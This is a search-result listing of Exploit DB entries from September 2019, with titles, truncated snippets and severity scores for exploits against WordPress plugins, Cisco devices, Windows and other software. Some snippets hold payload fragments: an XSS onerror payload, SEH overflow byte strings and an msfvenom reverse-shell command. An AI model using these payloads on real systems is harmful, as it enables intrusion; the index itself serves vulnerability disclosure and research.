Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2019/09/12 12:0 a.m.278 views

Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as web browsers and constitutes an attack surface for memory corruption bugs, as it...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/12 12:0 a.m.262 views

Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as the Chrome, Firefox and Edge browsers and constitutes an attack surface for memory...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/11 12:0 a.m.316 views

eWON Flexy - Authentication Bypass

!/usr/bin/env python ''' Exploit Title: eWON v13.0 Authentication Bypass Date: 2018-10-12 Exploit Author: Photubias – tijldotDeneutatHowestdotbe for www.ic4.be Vendor Advisory: 1 https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 2...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/11 12:0 a.m.389 views

AVCON6 systems management platform - OGNL Remote Command Execution

Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution Date: 10/09/2018 Exploit Author: Nassim Asrir Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: N\A Tested On: Windows 1064bit / 61.0b12 64-bit Thanks to: Otmane Aarab...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.378 views

WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)

Exploit Title: WordPress Plugin Photo Gallery by 10Web img src=a onerror='alert2;' 4. Click Save. 5. It will show pop-up confirming existence of XSS vulnerability Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released 1.5.35 09-10-2019 - Full...

6.1CVSS6.5AI score0.05303EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.299 views

WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting

Exploit Title: WordPress Plugin Photo Gallery by 10Web alert1; 4. Click Save and preview. 5. It will show pop-up confirming existence of XSS vulnerability Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released 1.5.35 09-10-2019 - Full Disclosu...

6.1CVSS6AI score0.04609EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.320 views

WordPress Plugin Photo Gallery 1.5.34 - SQL Injection

Exploit Title: WordPress Plugin Photo Gallery by 10Web Add new and in add galleries / Gallery groups. GET request going with parameter albumid is vulnerable to Time Based Blind SQL injection. Following is the POC, 1...

9.8CVSS9.8AI score0.25438EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.969 views

Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 10 UAC Protection Bypass Via Windows Store WSReset.exe', 'Description' = %q This module exploits a flaw in the WSReset.exe Windows Store...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.451 views

Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) and Registry (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 10 UAC Protection Bypass Via Windows Store WSReset.exe and Registry', 'Description' = %q This module exploits a flaw in the WSReset.exe...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.355 views

October CMS - Upload Protection Bypass Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'October CMS Upload Protection Bypass Code Execution', 'Description' = %q This module exploits an Authenticated user with permission to upload and...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/10 12:0 a.m.323 views

LibreNMS - Collectd Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreNMS Collectd Command Injection', 'Description' = %q This module exploits a command injection vulnerability in the Collectd graphing...

7.2CVSS7.4AI score0.80662EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.235 views

Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure

!/bin/bash Rifatron Intelligent Digital Security System animate.cgi Stream Disclosure Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd. Product web page: http://www.rifatron.com Affected version: 5brid DVR HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504 7brid DVR HD3-16V2, DX3-16V2/08V2/04V...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.265 views

Online Appointment - SQL Injection

Exploit Title: Online Appointment SQL Injection Data: 07.09.2019 Exploit Author: mohammad zaheri Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System Tested on: Windows Google Dork: N/A ========= Vulnerable Page: =========...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.332 views

Enigma NMS 65.0.0 - OS Command Injection

!/usr/bin/python -------------------------------------------------------------------- Exploit Title: Enigma NMS OS Command Injection NETSAS Pty Ltd Enigma NMS Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage: https://www.netsas.com.au/ Software...

10CVSS9.8AI score0.25279EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.281 views

Enigma NMS 65.0.0 - Cross-Site Request Forgery

-------------------------------------------------------------------- Exploit Title: Enigma NMS Cross-Site Request Forgery CSRF Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage: https://www.netsas.com.au/ Software Link:...

8.8CVSS9AI score0.00947EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.259 views

Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection

Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.dolibarr.org/ Software Link: https://www.dolibarr.org/downloads Version: 10.0.1 Category: Webapps Tested on: Xampp for Linux Software Description : Dolibarr ERP & CRM ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.247 views

WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting

Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: September 09,2019 Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads Software Link :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.271 views

Enigma NMS 65.0.0 - SQL Injection

-------------------------------------------------------------------- Exploit Title: Enigma NMS searchpattern SQL Injection Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage: https://www.netsas.com.au/ Software Link:...

9CVSS9AI score0.0281EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.456 views

Dolibarr ERP-CRM 10.0.1 - SQL Injection

Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.dolibarr.org/ Software Link: https://www.dolibarr.org/downloads Version: 10.0.1 Category: Webapps Tested on: Xampp for Linux Software Description : Dolibarr ERP & CR...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/09 12:0 a.m.425 views

WordPress Core 5.2.3 - Cross-Site Host Modification

!/usr/bin/perl -w Wordpress Type: Remote Risk: High Solution: Set security headers to web server and no-cache for Cache-Control Simple Attack Scenarios: o This attack can bypass Simple WAF to access restricted content on the web server, something like phpMyAdmin; o This attack can deface the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.107 views

Publisure Hybrid - Multiple Vulnerabilities

Exploit Title: PUBLISURE : From 0 to local Administrator 3 vulns exploit-chain Google Dork: N/A Date: 05/09/2019 Exploit Author: Bourbon Jean-Marie @kmkzsecurity - Hacknowledge company Vendor Homepage: https://www.publisure.com/ Software Link: N/C Version: version 2.1.2 Tested on: Windows 7...

9.8CVSS7AI score0.01503EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.169 views

Microsoft Windows NTFS - Privileged File Access Enumeration

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt + ISR: ApparitionSec Vendor www.microsoft.com Product Windows NTFS NTFS is a proprietary journaling file system...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.287 views

Inventory Webapp - 'itemquery' SQL injection

Exploit Title: Inventory Webapp SQL injection Data: 05.09.2019 Exploit Author: mohammad zaheri Vendor HomagePage: https://github.com/edlangley/inventory-webapp Tested on: Windows Google Dork: N/A ========= Vulnerable Page: ========= /php/add-item.php ========== Vulnerable Source: ========== Line3...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.692 views

Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution

!/usr/bin/python Exploit Title: Pulse Secure Post-Auth Remote Code Execution Google Dork: inurl:/dana-na/ filetype:cgi Date: 09/05/2019 Exploit Author: Justin Wagner 0xDezzy, Alyssa Herrera @AlyssaHerrera Vendor Homepage: https://pulsesecure.net Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before...

8CVSS7.7AI score0.98617EPSS
Exploits12
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.292 views

FusionPBX 4.4.8 - Remote Code Execution

!/usr/bin/python3 ''' Exploit Title: FusionPBX v4.4.8 Remote Code Execution Date: 13/08/2019 Exploit Author: Askar @mohammadaskar2 CVE : 2019-15029 Vendor Homepage: https://www.fusionpbx.com Software link: https://www.fusionpbx.com/download Version: v4.4.8 Tested on: Ubuntu 18.04 / PHP 7.2 '''...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/05 12:0 a.m.466 views

AwindInc SNMP Service - Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AwindInc SNMP Service Command Injection", 'Description' = %q This module exploits a vulnerability found in AwindInc and OEM'ed products where...

7.2CVSS7.4AI score0.71963EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/04 12:0 a.m.416 views

WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting

Exploit Title: WordPress Download Manager Cross-site Scripting Discovery Date: 2019-04-13 Exploit Author: ThuraMoeMyint Author Link: https://twitter.com/mgthuramoemyint Vendor Homepage: https://www.wpdownloadmanager.com Software Link: https://wordpress.org/plugins/download-manager Version: 2.9.93...

6.1CVSS6.5AI score0.12531EPSS
Exploits6
Exploit DB
Exploit DB
added 2019/09/04 12:0 a.m.350 views

DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting

Multiple Cross-Site Scripting XSS in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. Exploit Title: Multiple Cross-Site Scripting XSS in DASAN Zhone ZNID GP...

6.1CVSS6.5AI score0.07253EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.1735 views

Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework linux/armle/meterpreter/bindtcp - segfault linux/armle/meterpreter/reversetcp - segfault linux/armle/meterpreterreversehttp - works linux/armle/meterpreterreversehttps -...

10CVSS7.4AI score0.95707EPSS
Exploits15
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.331 views

ptrace - Sudo Token Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ptrace Sudo Token Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by blindly injecting into the session...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.875 views

FileThingie 2.5.7 - Arbitrary File Upload

Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload Author: Cakes Discovery Date: 2019-09-03 Vendor Homepage: www.solitude.dk/filethingie Software Link: https://github.com/leefish/filethingie/archive/master.zip Tested Version: 2.5.7 Tested on OS: CentOS 7 CVE: N/A Intro: Easy arbitrary file...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.283 views

Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution', 'Description' = %q DCNM exposes a file upload servlet FileUploadServlet...

9.8CVSS7AI score0.82815EPSS
Exploits8
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.316 views

Cisco UCS Director - default scpuser password (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'net/ssh' require 'net/ssh/commandstream' class MetasploitModule "Cisco UCS Director default scpuser password", 'Description' = %q This module abuses a known...

10CVSS7.4AI score0.83386EPSS
Exploits8
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.274 views

ktsuss 1.4 - suid Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ktsuss suid Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versio...

10CVSS9.8AI score0.82828EPSS
Exploits6
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.33 views

Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)

Fileless UAC bypass WSReset.exe @404death base on : https://www.activecyber.us/activelabs/windows-uac-bypass EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47754.zip import sys, os from ctypes import import winreg CMD =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.385 views

ChaosPro 3.1 - SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.262 views

ChaosPro 2.1 - SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp LHOST=10.0.7.17 LPORT=4444 -e...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.375 views

Opencart 3.x - Cross-Site Scripting

Exploit Title: Opencart 3.x.x Authenticated Stored XSS Date: 08/15/2019 Exploit Author: Nipun Somani Author Web: http://thehackerstore.net Vendor Homepage: https://www.opencart.com/ Software Link: https://github.com/opencart/opencart Version: 3.x.x Tested on: Debian 9, Windows 10 x64 CVE :...

4.8CVSS5.5AI score0.01952EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.38 views

Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Webmin %q This exploit takes advantage of a code execution issue within the function unserialisevariable located in web-lib-funcs.pl, in order to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.387 views

Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection

!/usr/bin/perl -w Cisco Titsco Email Security Appliance IronPort C160 Header 'Host' Injection Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev i...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.450 views

Craft CMS 2.7.9/3.2.5 - Information Disclosure

Exploit Title : CraftCms Users information disclosure From uploaded File Author Discovered By : Mohammed Abdul Raheem Author's Company Name : TrekShield IT Solution Author Exploit-db : https://www.exploit-db.com/?author=9783 Found Vulnerability On : 20-07-2019 Vendor Homepage:https://craftcms.com...

5.3CVSS5.6AI score0.07968EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.296 views

Kaseya VSA agent 9.5 - Privilege Escalation

Exploit Title: Kaseya VSA agent CVE-2017-12410 found by Filip Palian. A a fix was put in place for the original CVE, however it was specific to binaries and not scripts. The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process...

7.4CVSS7.7AI score0.00251EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.298 views

Alkacon OpenCMS 10.5.x - Local File inclusion

Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management Google Dork: N/A Date: 18/07/2019 Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5 / 10.5.4 CVE :...

4.3CVSS5AI score0.07346EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.261 views

Alkacon OpenCMS 10.5.x - Cross-Site Scripting

Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template Google Dork: N/A Date: 18/07/2019 Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/apollo-template Version: 10.5.x Tested on: 10.5.5 / 10.5.4 CVE : CVE-2019-13234,...

6.1CVSS6.5AI score0.02904EPSS
Exploits6
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.57 views

Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery

Hello, Please find the below vulnerability details, --------------------------------------------------------------------------------------------------------------------------------- Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery CSRF vulnerability Date: 02/09/2019 Exploit...

6.5CVSS6.8AI score0.00655EPSS
Exploits3
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.547 views

Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)

Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management Google Dork: N/A Date: 18/07/2019 Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5 / 10.5.4 CVE :...

6.1CVSS6.5AI score0.03114EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.257 views

WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection

Exploit Title: WordPress Plugin Event Tickets = 4.10.7.1 - CSV Injection Google Dork: inurl:"\wp-content\plugins\event-tickets" Date: 09-01-2019 Exploit Author: MTK http://mtk911.cf/ Vendor Homepage: https://tri.be/ Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.399 views

IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read

!/usr/bin/perl -w IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read Todor Donev 2019 c Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.296 views

ChaosPro 2.0 - SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/30 12:0 a.m.347 views

WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting

Exploit Title: WordPress Plugin WooCommerce Product Feed = 2.2.18 - Cross-Site Scripting Date: 30 August 2019 Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/ Version: = 2.2.18 Tested on: Ubuntu 18.04.1 CV...

5.4CVSS5.9AI score0.03213EPSS
Exploits5
Total number of security vulnerabilities47904